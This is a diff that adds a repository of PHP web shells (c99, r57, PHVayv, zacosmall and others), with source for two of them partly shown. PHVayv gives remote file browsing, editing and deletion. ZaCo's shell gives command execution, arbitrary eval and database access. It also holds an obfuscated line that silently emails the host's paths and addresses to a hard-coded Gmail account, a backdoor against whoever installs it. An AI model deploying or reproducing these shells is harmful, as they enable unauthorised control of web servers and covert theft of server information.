<td width="1" height="19"></td>
|
||||||
|
<td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt"> <?echo "$dizin/$duzenle"?></font></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td width="1" height="1"></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#000000"> </td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#9F9F9F">
|
||||||
|
<form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
|
||||||
|
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
|
||||||
|
<br>
|
||||||
|
<textarea name="duzenx"
|
||||||
|
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
|
||||||
|
|
||||||
|
|
||||||
|
rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
|
||||||
|
while(! feof ( $baglan ) ){
|
||||||
|
$okunan=fgets($baglan,1024);
|
||||||
|
echo $okunan;
|
||||||
|
} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||||
|
<br>
|
||||||
|
</font></b>
|
||||||
|
<span class="gensmall">
|
||||||
|
<input type="submit" size="16"
|
||||||
|
name="duzenx1" value="Kaydet"
|
||||||
|
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||||
|
</span></p>
|
||||||
|
</form>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#000000">
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<?
|
||||||
|
} else {
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<html>
|
||||||
|
|
||||||
|
<head>
|
||||||
|
<meta http-equiv="Content-Language" content="tr">
|
||||||
|
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
|
||||||
|
<meta name="ProgId" content="FrontPage.Editor.Document">
|
||||||
|
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||||
|
<title>PHVayv 1.0</title>
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body topmargin="0" leftmargin="0">
|
||||||
|
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||||
|
<tr>
|
||||||
|
<td width="70" bgcolor="#000000" height="76">
|
||||||
|
<p align="center">
|
||||||
|
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||||
|
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||||
|
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||||
|
<span style="font-weight: 700">
|
||||||
|
<br>
|
||||||
|
AventGrup<75><br>
|
||||||
|
</span>Avrasya Veri ve NetWork Teknolojileri Geli<6C>tirme Grubu<br>
|
||||||
|
<span style="font-weight: 700">
|
||||||
|
<br>
|
||||||
|
PHVayv 1.0</span></font></td>
|
||||||
|
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||||
|
<p align="right"><span style="font-weight: 700">
|
||||||
|
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||||
|
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||||
|
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||||
|
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||||
|
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||||
|
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||||
|
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||||
|
<tr>
|
||||||
|
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||||
|
<span style="font-size: 8pt"> <3B>al<61><6C><EFBFBD>lan Klas<61>r</span></font></td>
|
||||||
|
<td bgcolor="#D6D6D6" height="20">
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||||
|
<tr>
|
||||||
|
<td width="1"></td>
|
||||||
|
<td><font face="Verdana" style="font-size: 8pt"> <?echo "$dizin"?></font></td>
|
||||||
|
<td width="65">
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
|
||||||
|
onmouseover='this.style.background="D9D9D9"'
|
||||||
|
onmouseout='this.style.background="9F9F9F"'
|
||||||
|
style="CURSOR: hand"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
>
|
||||||
|
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
|
||||||
|
<font color="#000000"><3E>st Klas<61>r</font></a></font></td>
|
||||||
|
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
|
||||||
|
<tr>
|
||||||
|
<td width="625" bgcolor="#000000"><span style="font-size: 2pt"> </span></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td bgcolor="#000000" height="20">
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
|
||||||
|
<tr>
|
||||||
|
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
|
||||||
|
<tr>
|
||||||
|
<td align="center" bgcolor="#5F5F5F"
|
||||||
|
onmouseover="style.background='#6F6F6F'"
|
||||||
|
onmouseout="style.background='#5F5F5F'"
|
||||||
|
style="CURSOR: hand"
|
||||||
|
|
||||||
|
height="19" bordercolor="#000000">
|
||||||
|
<span style="font-weight: 700">
|
||||||
|
<font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||||
|
<a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
|
||||||
|
<tr>
|
||||||
|
<td align="center" bgcolor="#5F5F5F" height="19"
|
||||||
|
onmouseover="style.background='#6F6F6F'"
|
||||||
|
onmouseout="style.background='#5F5F5F'"
|
||||||
|
style="CURSOR: hand"
|
||||||
|
bordercolor="#000000">
|
||||||
|
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
|
||||||
|
<a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
|
||||||
|
<font color="#9F9F9F">Yeni Klas<61>r</font></a></font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
|
||||||
|
<tr>
|
||||||
|
<td align="center" bgcolor="#5F5F5F" height="19"
|
||||||
|
onmouseover="style.background='#6F6F6F'"
|
||||||
|
onmouseout="style.background='#5F5F5F'"
|
||||||
|
style="CURSOR: hand"
|
||||||
|
bordercolor="#000000">
|
||||||
|
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
|
||||||
|
<a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
|
||||||
|
<tr>
|
||||||
|
<td width="30" height="17" bgcolor="#9F9F9F">
|
||||||
|
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> T<>r</font></td>
|
||||||
|
<td height="17" bgcolor="#9F9F9F">
|
||||||
|
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Dosya
|
||||||
|
Ad<41></font></td>
|
||||||
|
<td width="122" height="17" bgcolor="#9F9F9F">
|
||||||
|
<p align="center">
|
||||||
|
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> <3B><>lem</font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
<?
|
||||||
|
if ($sedat=@opendir($dizin)){
|
||||||
|
while (($ekinci=readdir ($sedat))){
|
||||||
|
if (is_dir("$dizin/$ekinci")){
|
||||||
|
?>
|
||||||
|
|
||||||
|
<? if ($ekinci=="." or $ekinci=="..") {
|
||||||
|
} else {
|
||||||
|
?>
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
|
||||||
|
<tr>
|
||||||
|
<td width="30" height="17" bgcolor="#808080">
|
||||||
|
<p align="center">
|
||||||
|
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
|
||||||
|
<td height="17" bgcolor="#C4C4C4">
|
||||||
|
<font face="Verdana" style="font-size: 8pt"> <?echo "$ekinci" ?></font></td>
|
||||||
|
<td width="61" height="17" bgcolor="#C4C4C4" align="center">
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#A3A3A3"
|
||||||
|
onmouseover="this.style.background='#BBBBBB'"
|
||||||
|
onmouseout="this.style.background='#A3A3A3'"
|
||||||
|
style="CURSOR: hand"
|
||||||
|
height="20">
|
||||||
|
|
||||||
|
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||||
|
<a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
|
||||||
|
<font color="#000000">A<></font></a></font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
<td width="60" height="17" bgcolor="#C4C4C4" align="center">
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#A3A3A3"
|
||||||
|
onmouseover="this.style.background='#BBBBBB'"
|
||||||
|
onmouseout="this.style.background='#A3A3A3'"
|
||||||
|
|
||||||
|
|
||||||
|
style="CURSOR: hand"
|
||||||
|
height="20">
|
||||||
|
|
||||||
|
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||||
|
<a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
|
||||||
|
<font color="#000000">Sil</font></a>
|
||||||
|
|
||||||
|
</font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<?
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
||||||
|
<?
|
||||||
|
}}}
|
||||||
|
closedir($sedat);
|
||||||
|
?>
|
||||||
|
|
||||||
|
<?
|
||||||
|
if ($sedat=@opendir($dizin)){
|
||||||
|
while (($ekinci=readdir ($sedat))){
|
||||||
|
if (is_file("$dizin/$ekinci")){
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
|
||||||
|
<tr>
|
||||||
|
<td width="30" height="1" bgcolor="#B0B0B0">
|
||||||
|
<p align="center">
|
||||||
|
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
|
||||||
|
<td height="1" bgcolor="#EAEAEA">
|
||||||
|
<font face="Verdana" style="font-size: 8pt"> <?echo "$ekinci" ?></font>
|
||||||
|
<font face="Arial Narrow" style="font-size: 8pt"> ( XXX ) </font></td>
|
||||||
|
<td width="61" height="1" bgcolor="#D6D6D6" align="center">
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#D6D6D6"
|
||||||
|
onmouseover="this.style.background='#ACACAC'"
|
||||||
|
onmouseout="this.style.background='#D6D6D6'"
|
||||||
|
style="CURSOR: hand"
|
||||||
|
height="20">
|
||||||
|
|
||||||
|
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||||
|
<a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
|
||||||
|
<font color="#000000">D<>zenle</font></a></font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
<td width="60" height="1" bgcolor="#D6D6D6" align="center">
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#D6D6D6" no wrap
|
||||||
|
onmouseover="this.style.background='#ACACAC'"
|
||||||
|
onmouseout="this.style.background='#D6D6D6'"
|
||||||
|
style="CURSOR: hand"
|
||||||
|
height="20">
|
||||||
|
|
||||||
|
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||||
|
<a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
|
||||||
|
<font color="#000000">Sil</font></a></font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
<?
|
||||||
|
}}}
|
||||||
|
closedir($sedat);
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#000000"> </td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#000000">
|
||||||
|
</body></html><? } ?><? } ?><? } ?><? } ?>
|
||||||
BIN
php/PHPshell/PHP Shell/PHP Shell.jpg
Normal file
BIN
php/PHPshell/PHP Shell/PHP Shell.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 60 KiB |
1010
php/PHPshell/PHP Shell/PHP Shell.php
Normal file
1010
php/PHPshell/PHP Shell/PHP Shell.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/PHP Shell/PHP Shell2.jpg
Normal file
BIN
php/PHPshell/PHP Shell/PHP Shell2.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 136 KiB |
BIN
php/PHPshell/PHP Shell/PHP Shell3.jpg
Normal file
BIN
php/PHPshell/PHP Shell/PHP Shell3.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 26 KiB |
BIN
php/PHPshell/PHPRemoteView/PHPRemoteView.jpg
Normal file
BIN
php/PHPshell/PHPRemoteView/PHPRemoteView.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 27 KiB |
2553
php/PHPshell/PHPRemoteView/PHPRemoteView.php
Normal file
2553
php/PHPshell/PHPRemoteView/PHPRemoteView.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/PHPRemoteView/PHPRemoteView2.jpg
Normal file
BIN
php/PHPshell/PHPRemoteView/PHPRemoteView2.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 74 KiB |
BIN
php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.jpg
Normal file
BIN
php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 94 KiB |
2246
php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.php
Normal file
2246
php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/c99/c99.jpg
Normal file
BIN
php/PHPshell/c99/c99.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 74 KiB |
3069
php/PHPshell/c99/c99.php
Normal file
3069
php/PHPshell/c99/c99.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/c99_PSych0/c99_PSych0.jpg
Normal file
BIN
php/PHPshell/c99_PSych0/c99_PSych0.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 71 KiB |
3284
php/PHPshell/c99_PSych0/c99_PSych0.php
Normal file
3284
php/PHPshell/c99_PSych0/c99_PSych0.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/c99_locus7s/c99_locus7s.jpg
Normal file
BIN
php/PHPshell/c99_locus7s/c99_locus7s.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 81 KiB |
3595
php/PHPshell/c99_locus7s/c99_locus7s.php
Normal file
3595
php/PHPshell/c99_locus7s/c99_locus7s.php
Normal file
File diff suppressed because one or more lines are too long
BIN
php/PHPshell/c99_locus7s/c99_locus7s2.jpg
Normal file
BIN
php/PHPshell/c99_locus7s/c99_locus7s2.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 63 KiB |
BIN
php/PHPshell/c99_w4cking/c99_w4cking.jpg
Normal file
BIN
php/PHPshell/c99_w4cking/c99_w4cking.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 90 KiB |
2831
php/PHPshell/c99_w4cking/c99_w4cking.php
Normal file
2831
php/PHPshell/c99_w4cking/c99_w4cking.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/c99_w4cking/c99_w4cking2.jpg
Normal file
BIN
php/PHPshell/c99_w4cking/c99_w4cking2.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 72 KiB |
BIN
php/PHPshell/c99shell/c99shell.jpg
Normal file
BIN
php/PHPshell/c99shell/c99shell.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 75 KiB |
2900
php/PHPshell/c99shell/c99shell.php
Normal file
2900
php/PHPshell/c99shell/c99shell.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/ctt_sh/ctt_sh.jpg
Normal file
BIN
php/PHPshell/ctt_sh/ctt_sh.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 133 KiB |
2927
php/PHPshell/ctt_sh/ctt_sh.php
Normal file
2927
php/PHPshell/ctt_sh/ctt_sh.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/gfs_sh/gfs_sh.jpg
Normal file
BIN
php/PHPshell/gfs_sh/gfs_sh.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 58 KiB |
1575
php/PHPshell/gfs_sh/gfs_sh.php
Normal file
1575
php/PHPshell/gfs_sh/gfs_sh.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/gfs_sh/gfs_sh2.jpg
Normal file
BIN
php/PHPshell/gfs_sh/gfs_sh2.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 149 KiB |
BIN
php/PHPshell/iMHaPFtp/iMHaPFtp.jpg
Normal file
BIN
php/PHPshell/iMHaPFtp/iMHaPFtp.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 68 KiB |
2061
php/PHPshell/iMHaPFtp/iMHaPFtp.php
Normal file
2061
php/PHPshell/iMHaPFtp/iMHaPFtp.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/nstview/Thumbs.db
Normal file
BIN
php/PHPshell/nstview/Thumbs.db
Normal file
Binary file not shown.
BIN
php/PHPshell/nstview/nstview.jpg
Normal file
BIN
php/PHPshell/nstview/nstview.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 8.5 KiB |
2136
php/PHPshell/nstview/nstview.php
Normal file
2136
php/PHPshell/nstview/nstview.php
Normal file
File diff suppressed because one or more lines are too long
BIN
php/PHPshell/nstview/nstview2.jpg
Normal file
BIN
php/PHPshell/nstview/nstview2.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 70 KiB |
BIN
php/PHPshell/r57shell/r57shell.jpg
Normal file
BIN
php/PHPshell/r57shell/r57shell.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 95 KiB |
2187
php/PHPshell/r57shell/r57shell.php
Normal file
2187
php/PHPshell/r57shell/r57shell.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/r57shell127/r57shell127.jpg
Normal file
BIN
php/PHPshell/r57shell127/r57shell127.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 91 KiB |
2287
php/PHPshell/r57shell127/r57shell127.php
Normal file
2287
php/PHPshell/r57shell127/r57shell127.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/zacosmall/zacosmall.jpg
Normal file
BIN
php/PHPshell/zacosmall/zacosmall.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 60 KiB |
501
php/PHPshell/zacosmall/zacosmall.php
Normal file
501
php/PHPshell/zacosmall/zacosmall.php
Normal file
@@ -0,0 +1,501 @@
|
|||||||
|
<?
|
||||||
|
##########################################################
|
||||||
|
# Small PHP Web Shell by ZaCo (c) 2004-2006 #
|
||||||
|
# +POST method #
|
||||||
|
# +MySQL Client+Dumper for DB and tables #
|
||||||
|
# +PHP eval in text format and html for phpinfo() example #
|
||||||
|
# PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther #
|
||||||
|
# For antichat.ru and cup.su friends usage #
|
||||||
|
# All bugs -> mailo:zaco@yandex.ru #
|
||||||
|
# Just for fun :) #
|
||||||
|
##########################################################
|
||||||
|
error_reporting(E_ALL);
|
||||||
|
@set_time_limit(0);
|
||||||
|
function magic_q($s)
|
||||||
|
{
|
||||||
|
if(get_magic_quotes_gpc())
|
||||||
|
{
|
||||||
|
$s=str_replace('\\\'','\'',$s);
|
||||||
|
$s=str_replace('\\\\','\\',$s);
|
||||||
|
$s=str_replace('\\"','"',$s);
|
||||||
|
$s=str_replace('\\\0','\0',$s);
|
||||||
|
}
|
||||||
|
return $s;
|
||||||
|
}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
||||||
|
function get_perms($fn)
|
||||||
|
{
|
||||||
|
$mode=fileperms($fn);
|
||||||
|
$perms='';
|
||||||
|
$perms .= ($mode & 00400) ? 'r' : '-';
|
||||||
|
$perms .= ($mode & 00200) ? 'w' : '-';
|
||||||
|
$perms .= ($mode & 00100) ? 'x' : '-';
|
||||||
|
$perms .= ($mode & 00040) ? 'r' : '-';
|
||||||
|
$perms .= ($mode & 00020) ? 'w' : '-';
|
||||||
|
$perms .= ($mode & 00010) ? 'x' : '-';
|
||||||
|
$perms .= ($mode & 00004) ? 'r' : '-';
|
||||||
|
$perms .= ($mode & 00002) ? 'w' : '-';
|
||||||
|
$perms .= ($mode & 00001) ? 'x' : '-';
|
||||||
|
return $perms;
|
||||||
|
}
|
||||||
|
$head=<<<headka
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Small Web Shell by ZaCo</title>
|
||||||
|
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
|
||||||
|
</head>
|
||||||
|
<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
|
||||||
|
<style>
|
||||||
|
textarea {
|
||||||
|
BORDER-RIGHT: #ffffff 1px solid;
|
||||||
|
BORDER-TOP: #999999 1px solid;
|
||||||
|
BORDER-LEFT: #999999 1px solid;
|
||||||
|
BORDER-BOTTOM: #ffffff 1px solid;
|
||||||
|
BACKGROUND-COLOR: #e4e0d8;
|
||||||
|
font: Fixedsys bold;
|
||||||
|
}
|
||||||
|
input {
|
||||||
|
BORDER-RIGHT: #ffffff 1px solid;
|
||||||
|
BORDER-TOP: #999999 1px solid;
|
||||||
|
BORDER-LEFT: #999999 1px solid;
|
||||||
|
BORDER-BOTTOM: #ffffff 1px solid;
|
||||||
|
BACKGROUND-COLOR: #e4e0d8;
|
||||||
|
font: 8pt Verdana;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
headka;
|
||||||
|
$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
|
||||||
|
$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
|
||||||
|
$winda=strpos(strtolower(php_uname()),'wind');
|
||||||
|
define('format',50);
|
||||||
|
$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
|
||||||
|
switch($page)
|
||||||
|
{
|
||||||
|
case 'eval':
|
||||||
|
{
|
||||||
|
$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
|
||||||
|
$eval_value=magic_q($eval_value);
|
||||||
|
$action=isset($_POST['action'])?$_POST['action']:'eval';
|
||||||
|
if($action=='eval_in_html') @eval($eval_value);
|
||||||
|
else
|
||||||
|
{
|
||||||
|
echo($head.$pages);
|
||||||
|
?>
|
||||||
|
<hr>
|
||||||
|
<form method=post>
|
||||||
|
<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
|
||||||
|
<input name='action' value='eval' type='submit'>
|
||||||
|
<input name='action' value='eval_in_html' type='submit'>
|
||||||
|
<input name='page' value='eval' type=hidden>
|
||||||
|
</form>
|
||||||
|
<hr>
|
||||||
|
<?
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
case 'cmd':
|
||||||
|
{
|
||||||
|
$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
|
||||||
|
$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
|
||||||
|
$action=isset($_POST['action'])?$_POST['action']:'cmd';
|
||||||
|
if(@is_dir($work_dir))
|
||||||
|
{
|
||||||
|
@chdir($work_dir);
|
||||||
|
$work_dir=getcwd();
|
||||||
|
if($work_dir=='')$work_dir='/';
|
||||||
|
